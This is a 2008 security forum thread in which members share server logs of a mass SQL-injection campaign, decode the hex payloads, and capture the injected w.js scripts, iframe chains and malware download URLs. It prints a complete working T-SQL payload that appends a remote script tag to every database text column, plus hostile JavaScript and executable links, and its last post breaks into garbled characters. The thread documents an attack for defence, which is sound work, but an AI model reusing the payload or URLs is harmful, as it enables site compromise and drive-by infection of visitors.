Topic: SQL Injected jscript sites


August 07, 2008, 06:35:00 pm
Reply #90

Serg

One from today's logs on one of our servers.

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(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 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all, we have seen this same SQL injection attempt from 35 individual IPs today.
Try Google to count the infected forum posts...

August 09, 2008, 10:38:21 am
Reply #91

Orac

Log entry, with IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 +0000] "GET /rrpad/pad.xml?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

Decoded:
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39  0000] "GET /rrpad/pad.xml?';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

Code: [Select]
--11:24:09--  http://sdo.1000mg.cn/csrss/w.js
           => `w.js'
Resolving sdo.1000mg.cn... 121.11.76.85
Connecting to sdo.1000mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
// Captured sample of w.js, the file loaded by the <script src=...w.js> tag that the SQL payload appends to every text column.
// Returning true from window.onerror suppresses the browser's default script-error handling.
window.onerror=function(){return true;}
// js86eus is a run-once flag: because the tag is appended to every column, the script can be included several times on one page.
if(typeof(js86eus)=="undefined")
{
var js86eus=1;

var yesdata;
// Visitor fingerprint as a query string: referrer, URL, colour depth, screen size,
// returning-visit count (cc_k, defined below), system language and user agent.
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
// 0x0 hidden iframe that reports the fingerprint to the count41.51yes.com counter (id 419214144).
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

// Second stage is selected by the browser's UI language: EN-US visitors get csrss/new.htm,
// everyone else kk/kk.htm, both from www.plgou.com in a 100x0 iframe.
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/kk/kk.htm></iframe>");
}

}

// Returns the slice of document.cookie starting at index iz and ending at the next ';'
// (or at the end of the cookie string when there is no further ';').
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
// Cookie lookup: scans document.cookie for "name=" at the start of each space-separated token
// and returns its value via y_gVal; returns null when the cookie is not present.
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
// Returning-visitor counter kept in two cookies, cck_lasttime and cck_count.
// First visit (no cck_lasttime): stores now in cck_lasttime, 0 in cck_count, returns 0.
// Later visits: if more than yesvisitor ms (36,000,000 ms = 10 h) have passed since cck_lasttime,
// increments cck_count and refreshes both cookies; returns the count either way.
// Cookies expire y_t ms (93,312,000 ms, about 25.9 h) after the call. y_c3 is assigned without var (implicit global).
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

The iframe link to count41.51yes.com returns a 500 internal server error; both iframe links to plgou.com are active.

In all, we saw this script from 236 individual IPs today.
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment.

August 09, 2008, 10:44:05 am
Reply #92

Kayrac

Code: [Select]
http://www.plgou.com/kk/rondll32.exe#version=1,0,0,1
for a direct link to the file; gonna run it in a sec when I get VMware back up and running

-Brian

different file here also
Code: [Select]
http://www.plgou.com/csrss/rondll32.exe

August 09, 2008, 01:06:15 pm
Reply #93

Kayrac

OK, the kk rondll32 file drops 2 files in the Windows font folders.


The other one (the csrss one) downloads these two:
Code: [Select]
http://www.plgou.com/comine/sl.exe

http://www.plgou.com/comine/server.exe
more to come!

Code: [Select]
http://www.plgou.com/csrss/index.html
which lists
Code: [Select]
2008-08-08 http://www.plgou.com/comine/sss.exe
2008-08-08 http://www.plgou.com/comine/sl.exe
2008-08-08 http://www.plgou.com/comine/server.exe

sl.exe won't run on Vista, stupid Vista :(

-Brian

August 12, 2008, 08:20:05 pm
Reply #94

JohnC

Thanks.

August 15, 2008, 02:48:13 pm
Reply #95

pcaccent

Quote
hxxp://a.mm861.com/1.js
   <_SCRIPT src="hxxp://a.mm861.com/1.js"></_SCRIPT>
   <_IFRAME src="hxxp://www.6980982jh.com/tt1.html" width=0 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.mydearsister.net/css/ad.htm" width=50 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.80man.com.cn/index.htm" width=0 height=0></_IFRAME>

Thank you Malzilla

August 15, 2008, 04:41:27 pm
Reply #96

Kayrac

From that JS file above:

Code: [Select]
51js.th-club.com/1794424.js
51js.th-club.com/2039774.js
51js.th-club.com/2068633.js
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2039774&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.mydearsister.net/css/ad.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2068633&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.80man.com.cn/index.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1794424&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.6980982jh.com/tt1.html
count14.51yes.com/click.aspx?id=146836447&logo=1
count14.51yes.com/count1.gif
count14.51yes.com/sa.aspx?id=146836447&refe=http%3A//www.6980982jh.com/tt1.html&location=http%3A//www.rigoogle.com/&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
count4.51yes.com/click.aspx?id=48870943&logo=1
count4.51yes.com/count1.gif
count4.51yes.com/sa.aspx?id=48870943&refe=&location=http%3A//www.6980982jh.com/tt1.html&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
icon.ajiang.net/icon_0.gif
www.6980982jh.com/favicon.ico
www.6980982jh.com/tt1.html
www.80man.com.cn/14.htm
www.80man.com.cn/4561.swf
www.80man.com.cn/WIN%209,0,47,0i.swf
www.80man.com.cn/css/css.exe
www.80man.com.cn/favicon.ico
www.80man.com.cn/flash.htm
www.80man.com.cn/index.htm
www.80man.com.cn/kkk.exe
www.80man.com.cn/office.htm
www.80man.com.cn/re10.htm
www.80man.com.cn/re11.htm
www.mydearsister.net/css/ad.htm
www.mydearsister.net/css/dadongi.asp?dadong=WIN%209,0,47,0
www.mydearsister.net/css/dadongi.swf
www.mydearsister.net/css/dd.exe
www.mydearsister.net/css/dx.exe
www.mydearsister.net/css/index.htm
www.mydearsister.net/css/kr.exe
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/mx.exe
www.mydearsister.net/css/ress.htm
www.mydearsister.net/favicon.ico
www.mydearsister.net/u.exe
www.mydearsister.netPOST/Count/Count.asp(application/x-www-form-urlencoded)
www.rigoogle.com/
www.rigoogle.com/flash.htm
www.rigoogle.com/help.exe
www.rigoogle.com/i47.swf
www.rigoogle.com/issf.html
www.rigoogle.com/office.htm
www.rigoogle.com/re10.htm
www.rigoogle.com/swfobject.js
 

August 16, 2008, 09:31:51 am
Reply #97

JohnC


August 16, 2008, 10:54:45 am
Reply #98

Orac

Sample log entry out of a total of 398 separate injection attempts involving the same script within the last 24 hours; IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47 +0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx- - [16/Aug/2008:03:00:47  0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Raw 
AS CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:18:59--  http://www3.800mg.cn/csrss/w.js
           => `w.js'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Script served by the injected w.js link:
Code: [Select]
// Captured sample of w.js from www3.800mg.cn; same structure as the earlier plgou.com sample, different second stage.
// Returning true from window.onerror suppresses the browser's default script-error handling.
window.onerror=function(){return true;}
// js8eus is a run-once flag: the SQL payload appends the tag to every text column, so it can be included several times per page.
if(typeof(js8eus)=="undefined")
{
var js8eus=1;

var yesdata;
// Visitor fingerprint as a query string: referrer, URL, colour depth, screen size,
// returning-visit count (cc_k, defined below), system language and user agent.
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
// 0x0 hidden iframe that reports the fingerprint to the count41.51yes.com counter (id 419214144).
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

// Second stage only for EN-US browsers: a 100x1 iframe to www3.800mg.cn/csrss/new.htm.
// The else branch is empty in this variant, so other locales receive nothing further.
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=1 src=http://www3.800mg.cn/csrss/new.htm></iframe>");

}else{

}

}

// Returns the slice of document.cookie starting at index iz and ending at the next ';'
// (or at the end of the cookie string when there is no further ';').
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
// Cookie lookup: scans document.cookie for "name=" at the start of each space-separated token
// and returns its value via y_gVal; returns null when the cookie is not present.
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
// Returning-visitor counter kept in two cookies, cck_lasttime and cck_count.
// First visit (no cck_lasttime): stores now in cck_lasttime, 0 in cck_count, returns 0.
// Later visits: if more than yesvisitor ms (36,000,000 ms = 10 h) have passed since cck_lasttime,
// increments cck_count and refreshes both cookies; returns the count either way.
// Cookies expire y_t ms (93,312,000 ms, about 25.9 h) after the call. y_c3 is assigned without var (implicit global).
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Second iframe link
Code: [Select]
--11:21:14--  http://www3.800mg.cn/csrss/new.htm
           => `new.htm'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--
// NOTE(review): the Sym* wrappers look like the pop-up-blocker shim that Symantec/Norton client
// software inserts into pages passing through it, not part of the served page — confirm before
// treating them as an indicator of the malware itself.

// Swallows every script error on the page.
function SymError()
{
  return true;
}

window.onerror = SymError;

// Keeps the real window.open so SymOnLoad (later in this page) can restore it.
var SymRealWinOpen = window.open;

// Replacement window.open that opens nothing and returns an empty object.
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<!-- Body of new.htm: a 51.la counter script, five 100x10 iframes resolved relative to this page
     (www3.800mg.cn/csrss/flash.htm, 06014.html, yahoo.htm, office.htm, ksx.htm) and a cnzz.com stats script. -->
<script src="http://js.users.51.la/2063988.js"></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src='http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288' language='javaScript' charset='gb2312'></script>

<script language="JavaScript">
<!--
// Second half of the Sym* shim (see the first script block): chains the page's own
// onload/onunload handlers around the window.open swap.
var SymRealOnLoad;
var SymRealOnUnload;

// On unload: re-install the no-op window.open, then run the page's original onunload if any.
function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

// On load: run the page's original onload, restore the real window.open,
// and hook the page's onunload behind SymOnUnload.
function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


First iframe link
Code: [Select]
--11:24:21--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Secondary iframe
Code: [Select]
--11:29:33--  http://js.users.51.la/2063988.js
           => `2063988.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// Captured 51.la counter script (site id 2063988).
// 1) Writes a visible badge link to www.51.la with an icon from icon.ajiang.net.
document.write ('<a href="http://www.51.la/?2063988" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
// 2) Suppresses script errors.
window.onerror=function(){return true};
// 3) Writes a chain of inline scripts that read and increment the AJSTAT_ok_pages (1 h) and
//    AJSTAT_ok_times (about 1 y) cookies, collect top/parent referrer, colour depth, screen size and
//    timezone, and emit a 0x0 image beacon to web.51.la/go.asp carrying those values.
document.write ('<script>var a3988tf="51la";var a3988pu="";var a3988pf="51la";var a3988su=window.location;var a3988sf=document.referrer;var a3988of="";var a3988op="";var a3988ops=1;var a3988ot=1;var a3988d=new Date();var a3988color="";if (navigator.appName=="Netscape"){a3988color=screen.pixelDepth;} else {a3988color=screen.colorDepth;}<\/script><script>a3988tf=top.document.referrer;<\/script><script>a3988pu =window.parent.location;<\/script><script>a3988pf=window.parent.document.referrer;<\/script><script>a3988ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3988ops=(a3988ops==null)?1: (parseInt(unescape((a3988ops)[2]))+1);var a3988oe =new Date();a3988oe.setTime(a3988oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3988ops+ ";path=/;expires="+a3988oe.toGMTString();a3988ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3988ot==null){a3988ot=1;}else{a3988ot=parseInt(unescape((a3988ot)[2])); a3988ot=(a3988ops==1)?(a3988ot+1):(a3988ot);}a3988oe.setTime(a3988oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3988ot+";path=/;expires="+a3988oe.toGMTString();<\/script><script>a3988of=a3988sf;if(a3988pf!=="51la"){a3988of=a3988pf;}if(a3988tf!=="51la"){a3988of=a3988tf;}a3988op=a3988pu;try{lainframe}catch(e){a3988op=a3988su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2063988&tpages=\'+a3988ops+\'&ttimes=\'+a3988ot+\'&tzone=\'+(0-a3988d.getTimezoneOffset()/60)+\'&tcolor=\'+a3988color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3988of)+\'&vpage=\'+escape(a3988op)+\'" \/>\');<\/script>');


Script link
Code: [Select]
--11:35:17--  http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288
           => `stat.php?id=1005288&web_id=1005288'
Resolving s135.cnzz.com... 219.232.241.139
Connecting to s135.cnzz.com[219.232.241.139]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// Returns the URL-decoded slice of document.cookie from index `of` to the next ';'
// (or to the end of the cookie string when there is none).
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
// Cookie lookup: scans document.cookie for "n=" at the start of each space-separated token
// and returns its decoded value via gv_cnzz; returns -1 (not null) when absent.
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
// cnzz.com visitor-statistics script (site id 1005288), as served by s135.cnzz.com.
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
// Browser/OS fingerprint for the beacon; ntime is a fixed server-side timestamp baked into the served file.
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.38678100 1218883460';
// Per-site visit counter cookie cnzz_a1005288: incremented on repeat visits, 0 on the first.
var cnzz_a=gc_cnzz("cnzz_a1005288");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
// rtime = returning-visit count, ltime = last visit (ms), cnzz_eid = random visitor id plus referrer.
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
// A missing/invalid ltime (gc_cnzz returns -1) resets both counters.
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
// Counts a return visit when more than 500*86400 ms (12 h) have passed since ltime.
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
// Visible "站长统计" (site statistics) link, then a 0x0 image beacon to 222.77.187.108 carrying the data string.
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1005288" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://222.77.187.108/stat.htm?id=1005288'+data+'" border=0 width=0 height=0>');
// cnzz_a1005288 expires at the end of the current local day; the other three cookies after 182 days.
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1005288="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment.

August 16, 2008, 05:29:36 pm
Reply #99

JohnC


August 17, 2008, 10:59:07 am
Reply #100

Orac

Further to my post of August 16, 2008, we had a total of 2,051 injection attempts involving this same script in the last 24 hours.
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment.

August 18, 2008, 09:26:15 am
Reply #101

Orac

With reference to my post of August 16, 2008, we had a total of 1,552 injection attempts involving this same script in the last 24 hours.

The link is now returning a 500 internal server error.
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment.

August 20, 2008, 09:59:36 am
Reply #102

Orac

New SQL injection attempt injecting sdo.1000mg.cn/csrss/w.js

Original encoded form
Code: [Select]
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!
372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script 7!
7&3&嘒GⅡ6F蜚謗6怫77'72鱮妲2#懵67&C懵乙rrr攄UD4銾匓e$粢F&芔7W'6"斿DB2T銪4孽4RF&芔7W'6"DT哪4DRF&芔7W'62

The link returns a 500 Internal server error.
